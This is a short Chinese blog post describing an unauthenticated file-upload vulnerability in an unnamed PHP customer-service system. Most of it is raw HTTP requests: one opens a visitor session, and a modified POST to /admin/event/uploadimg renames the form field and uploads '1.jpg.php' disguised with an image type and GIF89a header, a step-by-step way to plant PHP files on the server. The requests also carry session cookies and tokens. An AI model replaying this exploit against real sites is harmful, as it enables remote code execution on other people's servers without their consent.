某PHP客服系统文件上传漏洞

彦祖 187

序言

偶感而发 ,散发思维

访问:/index/index/home?visiter_id=&visiter_name=&avatar=&business_id=1&groupid=0&special=1  
默认ID为1  接入客服  不然无法上传文件  

/admin/login/index/business_id/1.html  
一个客服  一个后台  没啥大用处   

对应客服的ID参数  

business_id  

groupid=1 客服组

第一处POST包

POST /admin/event/upload HTTP/1.1
Host: xx
Connection: close
Content-Length: 5306
Cache-Control: max-age=0
Origin: https://xx
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypU1bMpOOJxjkOoe8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.81 Safari/537.36 SE 2.X MetaSr 1.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: https://xx/index/index?code=vbSWPfra3nKF0yYFJIXazW00LzJy4Ffuh
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=6b7ukkvkqe9417kjlhabee2vlh; uid=1; token=b22056be-ef3f-4b67-9d8c-9bc3043c94c3; thinkphp_show_page_trace=1|1; HJLIVE_APP_FLAG=2; service_token=br5N%2B9nOqtxe

------WebKitFormBoundarypU1bMpOOJxjkOoe8
Content-Disposition: form-data; name="upload"; filename="timg.jpg"
Content-Type: image/jpeg

DATA
------WebKitFormBoundarypU1bMpOOJxjkOoe8--
参数修改
Content-Disposition: form-data; name="upload"
修改为
Content-Disposition: form-data; name="editormd-image-file"

POST请求
/admin/event/upload
改为
/admin/event/uploadimg
POST /admin/event/uploadimg HTTP/1.1
Host: xx
Content-Length: 1091
Accept: */*
Origin: http://xx
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.81 Safari/537.36 SE 2.X MetaSr 1.0
DNT: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1FiuKMxJGmw4fU34
Referer: http://xx/index/index?code=vbSWPfra3nKF0yYFJIXazW00LzJy4Ffuh
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: time=; thinkphp_show_page_trace=0|0; cu_com=; PHPSESSID=a8b4rfn2dedubj6svbdq3ghh8j; uid=1; token=9a90c51f-94ed-4e73-83f9-4492618a5e6a; Hm_lvt_be866aea230bec6f5762b245ccea50b0=1605445353; HJLIVE_APP_FLAG=2; Hm_lpvt_be866aea230bec6f5762b245ccea50b0=1605445381; service_token=br5N%2B9nOqtxe
Connection: close

------WebKitFormBoundary1FiuKMxJGmw4fU34
Content-Disposition: form-data; name="editormd-image-file"; filename="1.jpg.php"
Content-Type: image/png

GIF89a
------WebKitFormBoundary1FiuKMxJGmw4fU34--

本文作者为彦祖,转载请注明。

分享